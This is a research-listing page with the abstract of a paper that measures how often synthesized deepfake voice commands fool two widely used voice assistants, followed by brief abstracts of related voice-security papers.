Hello Me, Meet the Real Me: Audio Deepfake Attacks on Voice Assistants

02/20/2023
by   Domna Bilika, et al.
0

The radical advances in telecommunications and computer science have enabled a myriad of applications and novel seamless interaction with computing interfaces. Voice Assistants (VAs) have become a norm for smartphones, and millions of VAs incorporated in smart devices are used to control these devices in the smart home context. Previous research has shown that they are prone to attacks, leading vendors to countermeasures. One of these measures is to allow only a specific individual, the device's owner, to perform possibly dangerous tasks, that is, tasks that may disclose personal information, involve monetary transactions etc. To understand the extent to which VAs provide the necessary protection to their users, we experimented with two of the most widely used VAs, which the participants trained. We then utilised voice synthesis using samples provided by participants to synthesise commands that were used to trigger the corresponding VA and perform a dangerous task. Our extensive results showed that more than 30% of our deepfake attacks were successful and that there was at least one successful attack for more than half of the participants. Moreover, they illustrate statistically significant variation among vendors and, in one case, even gender bias. The outcomes are rather alarming and require the deployment of further countermeasures to prevent exploitation, as the number of VAs in use is currently comparable to the world population.

READ FULL TEXT

page 3

page 8

page 10

page 11

page 12

page 13

page 14

research
03/17/2019

Older Adults and Voice Interaction: A Pilot Study with Google Home

In this paper we present the results of an exploratory study examining t...
research
06/01/2021

A Continuous Liveness Detection for Voice Authentication on Smart Devices

Voice biometrics is drawing increasing attention as it is a promising al...
research
02/04/2023

BarrierBypass: Out-of-Sight Clean Voice Command Injection Attacks through Physical Barriers

The growing adoption of voice-enabled devices (e.g., smart speakers), pa...
research
06/27/2021

Open, Sesame! Introducing Access Control to Voice Services

Personal voice assistants (VAs) are shown to be vulnerable against recor...
research
11/08/2022

A Systematic Review of Ethical Concerns with Voice Assistants

Siri's introduction in 2011 marked the beginning of a wave of domestic v...
research
11/06/2022

Integrating Voice-Based Machine Learning Technology into Complex Home Environments

To demonstrate the value of machine learning based smart health technolo...
research
07/23/2023

Adversarial Agents For Attacking Inaudible Voice Activated Devices

The paper applies reinforcement learning to novel Internet of Thing conf...

Please sign up or login with your details

Forgot password? Click here to reset